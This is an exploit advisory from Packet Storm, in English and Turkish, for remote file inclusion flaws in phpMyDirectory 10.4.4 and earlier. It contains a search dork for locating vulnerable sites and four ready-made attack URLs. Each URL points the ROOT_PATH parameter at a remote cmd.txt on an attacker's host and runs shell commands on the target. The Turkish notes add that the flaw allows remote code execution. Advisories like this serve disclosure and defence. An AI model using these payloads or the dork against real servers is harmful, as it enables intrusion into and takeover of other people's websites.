phpMyDirectory versions 10.4.4 and below are susceptible to multiple remote file inclusion flaws.
afd42af68cbdfe2da2f9aa0642818fb5fb795b72a789b623abc444f26415a3f8ENGLISH
# Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Dork : "powered by phpmydirectory"
# Author : ajann
# greetz : Nukedx,TheHacker
# Exploit;
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
# ajann,Turkey
TURKISH
# Başlık : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Açığı Bulan : ajann
# greetz : Nukedx,TheHacker
# Açık bulunan dosyalar;
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
Açıklama:
Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede uzaktan kod çalıştırılabilir.
defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır.
Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır.
Thanks.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed